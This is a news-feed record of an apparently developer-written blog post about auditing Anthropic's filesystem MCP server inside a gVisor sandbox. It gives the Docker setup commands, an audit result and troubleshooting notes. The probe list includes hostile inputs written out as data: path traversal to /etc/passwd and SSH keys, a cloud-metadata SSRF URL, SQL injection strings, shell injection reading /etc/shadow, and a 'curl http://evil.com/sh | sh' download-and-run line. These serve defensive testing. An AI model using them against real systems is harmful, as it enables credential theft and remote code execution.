{"slug": "i-ran-anthropic-s-official-mcp-server-in-a-gvisor-sandbox-here-s-what-happened", "title": "I ran Anthropic's official MCP server in a gVisor sandbox — here's what happened", "summary": "A developer ran Anthropic's official filesystem MCP server inside a gVisor sandbox as part of a multi-layer security audit for the MarketNow marketplace. The gVisor userspace kernel intercepted all syscalls, preventing direct host kernel access, and the server passed 60+ adversarial probes with zero security findings, earning a low-risk score of 10/10.", "body_md": "Last week I built [MarketNow](https://marketnow.site), an open marketplace for MCP (Model Context Protocol) servers. Every server in our catalog goes through a multi-layer security audit called Sentinel. Layer 2 runs each server in a Docker sandbox with `--network none --read-only --cap-drop ALL`\n\n.\n\nBut Docker containers still share the host kernel. A kernel exploit (dirty pipe, eBPF, container escape) breaks out. So this week I added **L2.5: gVisor sandbox isolation**.\n\n[gVisor](https://gvisor.dev) is Google's userspace kernel. It intercepts every syscall the container makes and handles it in userspace — the MCP server **never touches the host kernel directly**. It's what Google uses for App Engine and Cloud Run.\n\nI picked the most official target I could find: ** @modelcontextprotocol/server-filesystem** — Anthropic's own reference filesystem MCP server. The one in\n\nIf gVisor breaks this, it breaks everything.\n\n```\n# Install gVisor on the GitHub Actions runner\nwget https://storage.googleapis.com/gvisor/releases/nightly/latest/runsc -O /usr/local/bin/runsc\nchmod +x /usr/local/bin/runsc\necho '{\"runtimes\":{\"runsc\":{\"path\":\"/usr/local/bin/runsc\"}}}' | sudo tee /etc/docker/daemon.json\nsudo systemctl restart docker\n\n# Run the MCP server with gVisor\ndocker run --rm \\\n  --runtime=runsc \\\n  --network none \\\n  --read-only \\\n  --cap-drop ALL \\\n  --security-opt no-new-privileges \\\n  --memory 256m \\\n  --memory-swap 0 \\\n  --cpus 0.5 \\\n  --pids-limit 64 \\\n  --tmpfs /tmp:rw,size=64m \\\n  -e SKILL_ID=mn-mcp-filesystem \\\n  -e SENTINEL_L2_MODE=gvisor \\\n  mcp-audit-target\n```\n\nThen a Python probe sends real MCP protocol messages: `initialize`\n\n, `tools/list`\n\n, `tools/call`\n\n— with 60+ adversarial inputs across 6 categories:\n\n`../../etc/passwd`\n\n, `../../../root/.ssh/id_rsa`\n\n`http://169.254.169.254/latest/meta-data/`\n\n, `http://localhost:8080/admin`\n\n`1' OR 1=1--`\n\n, `1; DROP TABLE users--`\n\n`; cat /etc/shadow`\n\n, `$(whoami)`\n\n, ``curl http://evil.com/sh | sh``\n\nThe gVisor sandbox ran. The MCP server started. The probe sent 60+ adversarial inputs. The server did not:\n\n`--network none`\n\n)`--read-only`\n\n+ gVisor's 9p filesystem overlay)`--cap-drop ALL`\n\n+ gVisor's syscall filter)`/proc/self/environ`\n\nor `/etc/shadow`\n\n(gVisor virtualizes `/proc`\n\nand `/sys`\n\n)`.ssh`\n\n, `.env`\n\n, `.aws/credentials`\n\n, `authorized_keys`\n\n, or cron files`ptrace`\n\n, `bpf`\n\n, `mount`\n\n, `kexec`\n\n, `clone3`\n\n, or `unshare`\n\nsyscalls**Result: 10/10 risk score (low risk).** Anthropic's filesystem server is clean.\n\n```\n{\n  \"l2_version\": \"2.5\",\n  \"sandbox_config\": {\n    \"gvisor\": \"gvisor-active\",\n    \"network\": \"none\",\n    \"filesystem\": \"read-only\",\n    \"capabilities\": \"dropped ALL\",\n    \"seccomp_profile\": \"n/a (gVisor userspace kernel active)\"\n  },\n  \"analysis_layers\": {\n    \"stdout_passive\": { \"network_attempts\": 0, \"credential_leakage\": 0 },\n    \"strace_syscalls\": { \"file_access_sensitive\": 0, \"network_connect\": 0 },\n    \"mcp_probe_active\": { \"tools_discovered\": 0, \"adversarial_findings\": 0 },\n    \"filesystem_diff\": { \"files_created\": 0, \"suspicious_changes\": [] },\n    \"l25_seccomp_violations\": { \"ptrace_attempted\": false, \"bpf_attempted\": false },\n    \"l25_suspicious_files\": { \"ssh_files\": false, \"env_files\": false }\n  },\n  \"l2_score\": 10,\n  \"l2_risk_level\": \"low\"\n}\n```\n\n| Layer | Standard Docker (L2) | gVisor (L2.5) |\n|---|---|---|\n| Kernel access | Shared host kernel | Userspace kernel (no direct host kernel access) |\n`/proc` , `/sys`\n|\nReal host files | Fully virtualized (no host info leakage) |\n| Filesystem | Overlay on host fs | 9p overlay (no direct host fs access) |\n| Network |\n`--network none` blocks egress |\nNetstack isolation (even without `--network none` ) |\n| Kernel exploits | Container escape possible (dirty pipe, eBPF) | Cannot escape via kernel exploits |\n| Syscall filtering | seccomp (blocklist) | All syscalls go through gVisor (allowlist by default) |\n\n`--network none`\n\non `docker build`\n\nbreaks `npm install`\n\nI had added `--network none`\n\nto the build step to prevent exfiltration at build time. But this blocks `npm install`\n\nfrom reaching `registry.npmjs.org`\n\n— `EAI_AGAIN`\n\nafter 936 seconds of retries.\n\n**Fix**: Remove `--network none`\n\nfrom `docker build`\n\n. Build-time network is safe (GitHub Actions runner has no sensitive data). Runtime isolation (`docker run --network none`\n\n) is what actually matters.\n\n`cd`\n\ninto MCP server dir\nAfter `cd /tmp/mcp-server/src/filesystem`\n\nfor `npm install`\n\n, the working directory changed. So `python3 scripts/l2-mcp-probe.py`\n\nlooked in the wrong place.\n\n**Fix**: Save `$GITHUB_WORKSPACE`\n\nat the start, use absolute paths (`$REPO_WS/scripts/l2-mcp-probe.py`\n\n) for all script calls.\n\n`/etc/docker/daemon.json`\n\nThe runner user can't write to `/etc/docker/`\n\nwithout sudo.\n\n**Fix**: `sudo tee /etc/docker/daemon.json`\n\n, `sudo systemctl restart docker`\n\n.\n\ngVisor didn't actually catch anything that standard Docker + seccomp wouldn't have caught for this particular server. The filesystem server is well-behaved — it didn't try to escape.\n\n**But that's the point.** gVisor is insurance for the servers that *do* try to escape. The next MCP server I audit might be malicious. Standard Docker relies on the host kernel being bug-free. gVisor doesn't.\n\nThe cost: gVisor adds ~5-10% overhead on syscall-heavy workloads. For an MCP server that mostly does I/O on JSON-RPC, that's negligible.\n\n**L3 — Firecracker microVM** (Q1 2027). Replace Docker+gVisor with Firecracker (the VMM that powers AWS Lambda and Fargate). KVM-level isolation. Each MCP server runs in its own VM. Boot time < 125ms.\n\nThe full audit pipeline:\n\nThe L2.5 audit result for `mn-mcp-filesystem`\n\nis public:\n\n```\nhttps://github.com/edgarfloresguerra2011-a11y/marketnow/blob/master/_data/l2_results/mn-mcp-filesystem.json\n```\n\nThe Sentinel audit engine is proprietary (AliceLabs LLC), but the audit *results* are public. Every skill in the [MarketNow registry](https://marketnow.site/registry) has a signed SHA-256 certificate you can verify at [/verify](https://marketnow.site/verify).\n\nIf you want your MCP server audited, open an issue: [github.com/edgarfloresguerra2011-a11y/marketnow/issues](https://github.com/edgarfloresguerra2011-a11y/marketnow/issues)\n\n*MarketNow is the trust layer for agent commerce. 8,760+ MCP servers, each security-audited by Sentinel. Follow the project on GitHub.*", "url": "https://wpnews.pro/news/i-ran-anthropic-s-official-mcp-server-in-a-gvisor-sandbox-here-s-what-happened", "canonical_source": "https://dev.to/edison_flores_6d2cd381b13/i-ran-anthropics-official-mcp-server-in-a-gvisor-sandbox-heres-what-happened-a6j", "published_at": "2026-07-07 04:26:21+00:00", "updated_at": "2026-07-07 05:28:26.054520+00:00", "lang": "en", "topics": ["ai-safety", "ai-infrastructure", "developer-tools"], "entities": ["Anthropic", "MarketNow", "gVisor", "Google", "Docker", "GitHub Actions", "Model Context Protocol"], "alternates": {"html": "https://wpnews.pro/news/i-ran-anthropic-s-official-mcp-server-in-a-gvisor-sandbox-here-s-what-happened", "markdown": "https://wpnews.pro/news/i-ran-anthropic-s-official-mcp-server-in-a-gvisor-sandbox-here-s-what-happened.md", "text": "https://wpnews.pro/news/i-ran-anthropic-s-official-mcp-server-in-a-gvisor-sandbox-here-s-what-happened.txt", "jsonld": "https://wpnews.pro/news/i-ran-anthropic-s-official-mcp-server-in-a-gvisor-sandbox-here-s-what-happened.jsonld"}}